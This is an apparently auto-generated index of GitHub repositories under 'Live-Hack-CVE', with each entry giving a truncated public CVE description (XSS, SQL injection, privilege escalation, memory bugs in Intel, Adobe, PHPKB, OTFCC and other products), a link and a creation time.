**upsMonitor in ViewPower (aka ViewPowerHTML) 1.04-21012 through 1.04-21353 has insecure permissions for the service binary that enable an Authenticated User to modify files, allowing for privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30490](https://github.com/Live-Hack-CVE/CVE-2021-30490) create time: 2022-12-30T06:04:18Z

**IPESA e-Flow 3.3.6 allows path traversal for reading any file within the web root directory via the lib/js/build/STEResource.res path and the R query parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42052](https://github.com/Live-Hack-CVE/CVE-2021-42052) create time: 2022-12-30T05:58:08Z

**Ampere Altra before SRP 1.08b and Altra Max? before SRP 2.05 allow information disclosure of power telemetry via HWmon. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45454](https://github.com/Live-Hack-CVE/CVE-2021-45454) create time: 2022-12-30T05:57:37Z

**radsecproxy is a generic RADIUS proxy that supports both UDP and TLS (RadSec) RADIUS transports. Missing input validation in radsecproxy's `naptr-eduroam.sh` and `radsec-dynsrv.sh` scripts can lead to configuration injection via crafted radsec peer discovery DNS records. Users are subject to Information disclosure, Den CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32642](https://github.com/Live-Hack-CVE/CVE-2021-32642) create time: 2022-12-30T05:23:44Z

**XSS can occur in GNOME Web (aka Epiphany) before 40.4 and 41.x before 41.1 via an error page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45088](https://github.com/Live-Hack-CVE/CVE-2021-45088) create time: 2022-12-30T05:23:09Z

**XSS can occur in GNOME Web (aka Epiphany) before 40.4 and 41.x before 41.1 when View Source mode or Reader mode is used, as demonstrated by a a page title. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45087](https://github.com/Live-Hack-CVE/CVE-2021-45087) create time: 2022-12-30T05:23:06Z

**XSS can occur in GNOME Web (aka Epiphany) before 40.4 and 41.x before 41.1 via an about: page, as demonstrated by ephy-about:overview when a user visits an XSS payload page often enough to place that page on the Most Visited list. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45085](https://github.com/Live-Hack-CVE/CVE-2021-45085) create time: 2022-12-30T05:23:02Z

**A vulnerability in the Cisco Adaptive Security Device Manager (ASDM) Launcher could allow an unauthenticated, remote attacker to execute arbitrary code on a user's operating system. This vulnerability is due to a lack of proper signature verification for specific code exchanged between the ASDM and the Launcher. An att CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-1585](https://github.com/Live-Hack-CVE/CVE-2021-1585) create time: 2022-12-30T05:22:45Z

**Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a Memory corruption vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21059](https://github.com/Live-Hack-CVE/CVE-2021-21059) create time: 2022-12-30T05:22:35Z

**Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a Memory corruption vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21062](https://github.com/Live-Hack-CVE/CVE-2021-21062) create time: 2022-12-30T05:22:31Z

**Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a Memory corruption vulnerability when parsing a specially crafted PDF file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21058](https://github.com/Live-Hack-CVE/CVE-2021-21058) create time: 2022-12-30T05:22:28Z

**Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to an insecure direct object reference (IDOR) in the product module. Successful exploitation could lead to unauthorized access to restricted resources. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21022](https://github.com/Live-Hack-CVE/CVE-2021-21022) create time: 2022-12-30T05:22:24Z

**Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by an memory corruption vulnerability. An unauthenticated attacker could leverage this vulnerability to cause an application denial-of-service. Exploitation of this issue requires CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21046](https://github.com/Live-Hack-CVE/CVE-2021-21046) create time: 2022-12-30T05:22:21Z

**Adobe Photoshop versions 21.2.4 (and earlier) and 22.1.1 (and earlier) are affected by a Memory Corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21048](https://github.com/Live-Hack-CVE/CVE-2021-21048) create time: 2022-12-30T05:22:18Z

**Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to an insecure direct object vulnerability (IDOR) in the checkout module. Successful exploitation could lead to sensitive information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21012](https://github.com/Live-Hack-CVE/CVE-2021-21012) create time: 2022-12-30T05:22:11Z

**Use of out-of-range pointer offset in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0189](https://github.com/Live-Hack-CVE/CVE-2021-0189) create time: 2022-12-30T05:21:35Z

**Unchecked return value in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0155](https://github.com/Live-Hack-CVE/CVE-2021-0155) create time: 2022-12-30T05:21:28Z

**Improper input validation in the BIOS authenticated code module for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0159](https://github.com/Live-Hack-CVE/CVE-2021-0159) create time: 2022-12-30T05:21:25Z

**Return of pointer value outside of expected range in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0188](https://github.com/Live-Hack-CVE/CVE-2021-0188) create time: 2022-12-30T05:21:21Z

**Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0154](https://github.com/Live-Hack-CVE/CVE-2021-0154) create time: 2022-12-30T05:21:11Z

**Out-of-bounds write in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable aescalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0153](https://github.com/Live-Hack-CVE/CVE-2021-0153) create time: 2022-12-30T05:21:08Z

**Execution unit scheduler contention may lead to a side channel vulnerability found on AMD CPU microarchitectures codenamed “Zen 1”, “Zen 2” and “Zen 3” that use simultaneous multithreading (SMT). By measuring the contention level on scheduler queues an attacker may potentially leak sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46778](https://github.com/Live-Hack-CVE/CVE-2021-46778) create time: 2022-12-30T05:19:34Z

**Improper buffer restrictions in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33847](https://github.com/Live-Hack-CVE/CVE-2021-33847) create time: 2022-12-30T05:18:30Z

**An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30070](https://github.com/Live-Hack-CVE/CVE-2021-30070) create time: 2022-12-30T05:18:09Z

**Incorrect default permissions for the Intel(R) Connect M Android application before version 1.7.4 may allow an authenticated user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44470](https://github.com/Live-Hack-CVE/CVE-2021-44470) create time: 2022-12-30T05:17:59Z

**Out of bounds read in firmware for some Intel(R) Wireless Bluetooth(R) and Killer(TM) Bluetooth(R) products before version 22.120 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26950](https://github.com/Live-Hack-CVE/CVE-2021-26950) create time: 2022-12-30T05:17:55Z

**Out of bounds read for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an unauthenticated user to potentially enable denial of service via adjacent access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23168](https://github.com/Live-Hack-CVE/CVE-2021-23168) create time: 2022-12-30T05:17:45Z

**Out of bounds read for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26254](https://github.com/Live-Hack-CVE/CVE-2021-26254) create time: 2022-12-30T05:17:35Z

**Improper access control for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow an authenticated user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23188](https://github.com/Live-Hack-CVE/CVE-2021-23188) create time: 2022-12-30T05:16:47Z

**The Web Console component of TIBCO Software Inc.'s TIBCO Data Science - Workbench, TIBCO Statistica, TIBCO Statistica - Estore Edition, and TIBCO Statistica Trial contains easily exploitable Reflected Cross Site Scripting (XSS) vulnerabilities that allow a low privileged attacker with network access to execute scripts CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30575](https://github.com/Live-Hack-CVE/CVE-2022-30575) create time: 2022-12-30T06:07:00Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x6badae. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35486](https://github.com/Live-Hack-CVE/CVE-2022-35486) create time: 2022-12-30T06:06:56Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x703969. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35485](https://github.com/Live-Hack-CVE/CVE-2022-35485) create time: 2022-12-30T06:06:53Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x6b6a8f. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35484](https://github.com/Live-Hack-CVE/CVE-2022-35484) create time: 2022-12-30T06:06:49Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x5266a8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35483](https://github.com/Live-Hack-CVE/CVE-2022-35483) create time: 2022-12-30T06:06:46Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x4fbc0b. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35476](https://github.com/Live-Hack-CVE/CVE-2022-35476) create time: 2022-12-30T06:06:42Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x65f724. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35482](https://github.com/Live-Hack-CVE/CVE-2022-35482) create time: 2022-12-30T06:06:39Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /multiarch/memmove-vec-unaligned-erms.S. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35481](https://github.com/Live-Hack-CVE/CVE-2022-35481) create time: 2022-12-30T06:06:35Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x4fbbb6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35479](https://github.com/Live-Hack-CVE/CVE-2022-35479) create time: 2022-12-30T06:06:32Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x6babea. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35478](https://github.com/Live-Hack-CVE/CVE-2022-35478) create time: 2022-12-30T06:06:28Z

**A vulnerability, which was classified as critical, has been found in SourceCodester Guest Management System. This issue affects some unknown processing of the file /guestmanagement/front.php. The manipulation of the argument rid leads to sql injection. The attack may be initiated remotely. The exploit has been disclose CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2847](https://github.com/Live-Hack-CVE/CVE-2022-2847) create time: 2022-12-30T06:06:25Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x4fe954. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35477](https://github.com/Live-Hack-CVE/CVE-2022-35477) create time: 2022-12-30T06:06:20Z

**tifig v0.2.2 was discovered to contain a resource allocation issue via operator new(unsigned long) at asan_new_delete.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36155](https://github.com/Live-Hack-CVE/CVE-2022-36155) create time: 2022-12-30T06:06:17Z

**tifig v0.2.2 was discovered to contain a memory leak via operator new[](unsigned long) at /asan/asan_new_delete.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36152](https://github.com/Live-Hack-CVE/CVE-2022-36152) create time: 2022-12-30T06:06:13Z

**tifig v0.2.2 was discovered to contain a segmentation violation via std::vector >::size() const at /bits/stl_vector.h. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36153](https://github.com/Live-Hack-CVE/CVE-2022-36153) create time: 2022-12-30T06:06:10Z

**tifig v0.2.2 was discovered to contain a segmentation violation via getType() at /common/bbox.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36151](https://github.com/Live-Hack-CVE/CVE-2022-36151) create time: 2022-12-30T06:06:06Z

**tifig v0.2.2 was discovered to contain a heap-buffer overflow via __asan_memmove at /asan/asan_interceptors_memintrinsics.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36150](https://github.com/Live-Hack-CVE/CVE-2022-36150) create time: 2022-12-30T06:06:03Z

**tifig v0.2.2 was discovered to contain a heap-use-after-free via temInfoEntry(). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36149](https://github.com/Live-Hack-CVE/CVE-2022-36149) create time: 2022-12-30T06:05:59Z

**SWFTools commit 772e55a2 was discovered to contain a segmentation violation via extractFrame at /readers/swf.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35114](https://github.com/Live-Hack-CVE/CVE-2022-35114) create time: 2022-12-30T06:05:48Z

**SWFTools commit 772e55a2 was discovered to contain a segmentation violation via gfxline_getbbox at /lib/gfxtools.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35100](https://github.com/Live-Hack-CVE/CVE-2022-35100) create time: 2022-12-30T06:05:44Z

**SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via swf_DefineLosslessBitsTagToImage at /modules/swfbits.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35113](https://github.com/Live-Hack-CVE/CVE-2022-35113) create time: 2022-12-30T06:05:41Z

**In the Framework, there is a possible way to enable a work profile without user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-18178 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20331](https://github.com/Live-Hack-CVE/CVE-2022-20331) create time: 2022-12-30T06:05:34Z

**Sequi PortBloque S has an improper authorization vulnerability, which may allow a low-privileged user to perform administrative functions using specifically crafted requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2661](https://github.com/Live-Hack-CVE/CVE-2022-2661) create time: 2022-12-30T06:05:26Z

**CENTUM VP / CS 3000 controller FCS (CP31, CP33, CP345, CP401, and CP451) contains an issue in processing communication packets, which may lead to resource consumption. If this vulnerability is exploited, an attacker may cause a denial of service (DoS) condition in ADL communication by sending a specially crafted packet CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33939](https://github.com/Live-Hack-CVE/CVE-2022-33939) create time: 2022-12-30T06:04:55Z

**'Hulu / ????' App for iOS versions prior to 3.0.81 improperly verifies server certificates, which may allow an attacker to eavesdrop on an encrypted communication via a man-in-the-middle attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34156](https://github.com/Live-Hack-CVE/CVE-2022-34156) create time: 2022-12-30T06:04:51Z

**Tenda AC9 V15.03.2.21_cn is vulnerable to command injection via goform/SetSysTimeCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36273](https://github.com/Live-Hack-CVE/CVE-2022-36273) create time: 2022-12-30T06:04:48Z

**A stored Cross Site Scripting (XSS) vulnerability in Esri Portal for ArcGIS may allow a remote, authenticated attacker to pass and store malicious strings via crafted queries which when accessed could potentially execute arbitrary JavaScript code in the user’s browser. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38192](https://github.com/Live-Hack-CVE/CVE-2022-38192) create time: 2022-12-30T06:04:44Z

**In Esri Portal for ArcGIS versions 10.8.1, a system property is not properly encrypted. This may lead to a local user reading sensitive information from a properties file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38194](https://github.com/Live-Hack-CVE/CVE-2022-38194) create time: 2022-12-30T06:04:41Z

**Mingsoft MCMS 5.2.8 was discovered to contain a SQL injection vulnerability in /mdiy/page/verify URI via fieldName parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36272](https://github.com/Live-Hack-CVE/CVE-2022-36272) create time: 2022-12-30T06:04:37Z

**A vulnerability was found in the 389 Directory Server that allows expired passwords to access the database to cause improper authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0996](https://github.com/Live-Hack-CVE/CVE-2022-0996) create time: 2022-12-30T06:04:34Z

**The function WavpackVerifySingleBlock in open_utils.c in libwavpack.a in WavPack through 5.1.0 allows attackers to cause a denial-of-service (out-of-bounds read and application crash) via a crafted WavPack Lossless Audio file, as demonstrated by wvunpack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19841](https://github.com/Live-Hack-CVE/CVE-2018-19841) create time: 2022-12-30T04:42:45Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-article.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10401](https://github.com/Live-Hack-CVE/CVE-2020-10401) create time: 2022-12-30T05:16:37Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-template.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10398](https://github.com/Live-Hack-CVE/CVE-2020-10398) create time: 2022-12-30T05:16:34Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-glossary.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10394](https://github.com/Live-Hack-CVE/CVE-2020-10394) create time: 2022-12-30T05:16:30Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-group.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10395](https://github.com/Live-Hack-CVE/CVE-2020-10395) create time: 2022-12-30T05:16:27Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-news.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10397](https://github.com/Live-Hack-CVE/CVE-2020-10397) create time: 2022-12-30T05:16:24Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-field.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10393](https://github.com/Live-Hack-CVE/CVE-2020-10393) create time: 2022-12-30T05:16:20Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-language.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10396](https://github.com/Live-Hack-CVE/CVE-2020-10396) create time: 2022-12-30T05:16:17Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-category.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10392](https://github.com/Live-Hack-CVE/CVE-2020-10392) create time: 2022-12-30T05:16:14Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-user.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10410](https://github.com/Live-Hack-CVE/CVE-2020-10410) create time: 2022-12-30T05:16:11Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/article-collaboration.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10400](https://github.com/Live-Hack-CVE/CVE-2020-10400) create time: 2022-12-30T05:16:07Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/add-user.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10399](https://github.com/Live-Hack-CVE/CVE-2020-10399) create time: 2022-12-30T05:16:04Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-news.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10407](https://github.com/Live-Hack-CVE/CVE-2020-10407) create time: 2022-12-30T05:16:00Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-subscriber.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10408](https://github.com/Live-Hack-CVE/CVE-2020-10408) create time: 2022-12-30T05:15:57Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-category.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10402](https://github.com/Live-Hack-CVE/CVE-2020-10402) create time: 2022-12-30T05:15:53Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-field.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10404](https://github.com/Live-Hack-CVE/CVE-2020-10404) create time: 2022-12-30T05:15:50Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-group.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10406](https://github.com/Live-Hack-CVE/CVE-2020-10406) create time: 2022-12-30T05:15:46Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-comment.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10403](https://github.com/Live-Hack-CVE/CVE-2020-10403) create time: 2022-12-30T05:15:43Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-glossary.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10405](https://github.com/Live-Hack-CVE/CVE-2020-10405) create time: 2022-12-30T05:15:40Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/edit-template.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10409](https://github.com/Live-Hack-CVE/CVE-2020-10409) create time: 2022-12-30T05:15:36Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/import-html.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10413](https://github.com/Live-Hack-CVE/CVE-2020-10413) create time: 2022-12-30T05:15:33Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/index-attachments.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10414](https://github.com/Live-Hack-CVE/CVE-2020-10414) create time: 2022-12-30T05:15:29Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/import-csv.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10412](https://github.com/Live-Hack-CVE/CVE-2020-10412) create time: 2022-12-30T05:15:05Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/email-harvester.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10411](https://github.com/Live-Hack-CVE/CVE-2020-10411) create time: 2022-12-30T05:15:01Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-attachments.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10418](https://github.com/Live-Hack-CVE/CVE-2020-10418) create time: 2022-12-30T05:14:58Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-comments.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10420](https://github.com/Live-Hack-CVE/CVE-2020-10420) create time: 2022-12-30T05:14:55Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/kb-backup.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10416](https://github.com/Live-Hack-CVE/CVE-2020-10416) create time: 2022-12-30T05:14:51Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/index.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10415](https://github.com/Live-Hack-CVE/CVE-2020-10415) create time: 2022-12-30T05:14:48Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-categories.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10419](https://github.com/Live-Hack-CVE/CVE-2020-10419) create time: 2022-12-30T05:14:45Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/manage-articles.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10417](https://github.com/Live-Hack-CVE/CVE-2020-10417) create time: 2022-12-30T05:14:41Z

**The way URIs are handled in admin/header.php in Chadha PHPKB Standard Multi-Language 9 allows Reflected XSS (injecting arbitrary web script or HTML) in admin/my-profile.php by adding a question mark (?) followed by the payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10436](https://github.com/Live-Hack-CVE/CVE-2020-10436) create time: 2022-12-30T05:14:38Z

**Improper initialization for some Intel(R) PROSet/Wireless WiFi and Killer(TM) WiFi products may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23223](https://github.com/Live-Hack-CVE/CVE-2021-23223) create time: 2022-12-30T05:16:44Z

**phpIPAM 1.4.4 allows Reflected XSS and CSRF via app/admin/subnets/find_free_section_subnets.php of the subnets functionality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46426](https://github.com/Live-Hack-CVE/CVE-2021-46426) create time: 2022-12-30T05:14:35Z

